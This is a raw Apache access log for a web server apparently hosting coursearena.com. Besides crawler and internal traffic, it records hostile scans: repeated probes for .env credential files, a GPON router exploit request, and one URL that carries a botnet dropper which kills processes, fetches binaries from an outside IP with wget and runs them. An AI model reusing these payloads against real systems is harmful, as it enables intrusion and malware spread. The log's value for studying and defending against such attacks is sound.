18.208.214.32 - - [07/Feb/2025:08:15:36 +0200] "GET /local/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:38 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:40 +0200] "GET /crm/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:41 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:43 +0200] "GET /audio/.env HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:44 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:46 +0200] "GET /app/config/.env HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:48 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:49 +0200] "GET /api/.env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:51 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:52 +0200] "GET /conf/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:54 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:55 +0200] "GET /database/.env HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
18.208.214.32 - - [07/Feb/2025:08:15:56 +0200] "GET /coursearena.com/.env HTTP/1.1" 404 218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
109.74.198.43 - - [07/Feb/2025:08:17:59 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
109.74.198.43 - - [07/Feb/2025:08:17:59 +0200] "\x16\x03\x01" 400 226 "-" "-"
109.74.198.43 - - [07/Feb/2025:08:17:59 +0200] "\x16\x03\x01" 400 226 "-" "-"
109.74.198.43 - - [07/Feb/2025:08:17:59 +0200] "\x16\x03\x01" 400 226 "-" "-"
87.236.176.71 - - [07/Feb/2025:08:20:29 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
::1 - - [07/Feb/2025:08:21:20 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:21:21 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:21:22 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
179.43.191.146 - - [07/Feb/2025:08:23:11 +0200] "GET / HTTP/1.1" 200 384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
37.139.53.80 - - [07/Feb/2025:08:35:32 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
119.13.156.201 - - [07/Feb/2025:08:38:01 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
119.13.156.201 - - [07/Feb/2025:08:38:02 +0200] "POST / HTTP/1.1" 404 198 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
119.13.156.201 - - [07/Feb/2025:08:38:02 +0200] "POST / HTTP/1.1" 404 198 "-" "python-requests/2.32.3"
119.13.156.201 - - [07/Feb/2025:08:38:02 +0200] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 200 385 "-" "python-requests/2.32.3"
119.13.156.201 - - [07/Feb/2025:08:38:03 +0200] "POST / HTTP/1.1" 404 198 "-" "python-requests/2.32.3"
180.102.134.69 - - [07/Feb/2025:08:40:24 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [07/Feb/2025:08:41:13 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:14 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:15 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:17 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:18 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:19 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:20 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:21 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:22 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:23 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:23 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:24 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:24 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:25 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:41:26 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
188.166.54.158 - - [07/Feb/2025:08:44:14 +0200] "GET / HTTP/1.1" 200 384 "-" "Mozilla/5.0 (compatible)"
188.166.54.158 - - [07/Feb/2025:08:44:15 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "http://tciserp.rightlearning.net/" "Mozilla/5.0 (compatible)"
188.166.54.158 - - [07/Feb/2025:08:44:15 +0200] "GET /ads.txt HTTP/1.1" 404 205 "-" "Mozilla/5.0 (compatible)"
95.214.55.43 - - [07/Feb/2025:08:47:26 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
37.139.53.80 - - [07/Feb/2025:08:52:43 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
58.49.233.126 - - [07/Feb/2025:08:53:10 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
::1 - - [07/Feb/2025:08:54:17 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:54:18 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:54:19 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:54:20 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:54:21 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:54:22 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:08:54:22 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
37.139.53.80 - - [07/Feb/2025:09:16:11 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
193.41.206.176 - - [07/Feb/2025:09:20:15 +0200] "GET /.env HTTP/1.1" 404 202 "-" "-"
193.41.206.176 - - [07/Feb/2025:09:20:19 +0200] "GET /conf/.env HTTP/1.1" 404 207 "-" "-"
37.139.53.80 - - [07/Feb/2025:09:32:28 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
62.113.113.162 - - [07/Feb/2025:09:33:18 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
51.8.102.73 - - [07/Feb/2025:09:43:13 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
114.119.153.188 - - [07/Feb/2025:09:46:43 +0200] "GET /register?p=8 HTTP/1.1" 404 206 "http://coursearena.com/plans?t=3" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.155.210 - - [07/Feb/2025:09:51:40 +0200] "GET /portal/checkFavorites/35 HTTP/1.1" 404 222 "http://coursearena.com/user/35" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
37.139.53.80 - - [07/Feb/2025:09:56:42 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
195.191.219.131 - - [07/Feb/2025:10:00:19 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
195.191.219.131 - - [07/Feb/2025:10:00:21 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
205.210.31.98 - - [07/Feb/2025:10:03:53 +0200] "GET / HTTP/1.0" 200 902 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
114.119.155.210 - - [07/Feb/2025:10:06:41 +0200] "GET /portal/checkFavorites/16 HTTP/1.1" 404 222 "http://coursearena.com/course/16" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.155.210 - - [07/Feb/2025:10:11:42 +0200] "GET /portal/checkFavorites/149 HTTP/1.1" 404 223 "http://coursearena.com/user/149" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
37.139.53.80 - - [07/Feb/2025:10:12:29 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
172.203.190.140 - - [07/Feb/2025:10:15:09 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
62.113.113.162 - - [07/Feb/2025:10:16:05 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
::1 - - [07/Feb/2025:10:17:13 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:10:17:14 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:10:17:15 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:10:17:30 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:10:17:31 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:10:19:58 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
124.45.17.81 - - [07/Feb/2025:10:21:49 +0200] "GET / HTTP/1.0" 200 902 "-" "curl/7.88.1"
120.86.255.122 - - [07/Feb/2025:10:35:10 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 216 "-" "Hello, World"
37.139.53.80 - - [07/Feb/2025:10:37:27 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
87.120.112.13 - - [07/Feb/2025:10:47:03 +0200] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
37.139.53.80 - - [07/Feb/2025:10:52:51 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:05 +0200] "GET /public/assets/site/css/imagehover.min.css HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:05 +0200] "GET /public/assets/site/css/font-awesome.min.css HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:05 +0200] "GET /public/assets/site/css/bootstrap-rtl.min.css HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:05 +0200] "GET /public/assets/site/css/style-rtl.css HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /public/assets/site/css/form_register.css HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /public/assets/site/css/datepicker.css HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET / HTTP/1.1" 200 386 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /public/assets/site/css/rtl.css HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /public/assets/site/css/imagehover.min.css HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /public/assets/site/css/font-awesome.min.css HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://coursearena.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /icons/text.gif HTTP/1.1" 200 229 "http://coursearena.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:06 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "http://coursearena.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36"
49.47.145.113 - - [07/Feb/2025:10:58:57 +0200] "-" 408 - "-" "-"
63.135.161.200 - - [07/Feb/2025:11:08:07 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
37.139.53.80 - - [07/Feb/2025:11:18:10 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
35.240.60.92 - - [07/Feb/2025:11:18:57 +0200] "GET / HTTP/1.1" 200 385 "-" "python-requests/2.32.3"
103.131.71.69 - - [07/Feb/2025:11:32:01 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
95.214.55.132 - - [07/Feb/2025:11:33:08 +0200] "GET / HTTP/1.1" 200 385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
37.139.53.80 - - [07/Feb/2025:11:33:13 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
141.98.11.35 - - [07/Feb/2025:11:35:15 +0200] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+efefa7;wget+http:/\\/176.65.140.135/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.140.135/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1" 404 203 "-" "KrebsOnSecurity"
::1 - - [07/Feb/2025:11:37:56 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:11:37:57 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
::1 - - [07/Feb/2025:11:37:58 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 (internal dummy connection)"
66.249.66.197 - - [07/Feb/2025:11:46:59 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.199 - - [07/Feb/2025:11:46:59 +0200] "GET /portal/checkFavorites/20?t=item HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.27 - - [07/Feb/2025:11:47:32 +0200] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)"
37.139.53.80 - - [07/Feb/2025:11:58:55 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
66.240.192.85 - - [07/Feb/2025:12:01:54 +0200] "\x16\x03\x01" 400 226 "-" "-"
64.62.197.87 - - [07/Feb/2025:12:11:42 +0200] "GET / HTTP/1.1" 200 383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
37.139.53.80 - - [07/Feb/2025:12:13:07 +0200] "GET / HTTP/1.0" 200 902 "http://coursearena.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
64.62.197.91 - - [07/Feb/2025:12:14:15 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.197.79 - - [07/Feb/2025:12:14:56 +0200] "GET /geoserver/web/ HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
64.62.197.88 - - [07/Feb/2025:12:15:35 +0200] "GET /info.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57"
64.62.197.83 - - [07/Feb/2025:12:15:46 +0200] "GET /phpinfo.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46"
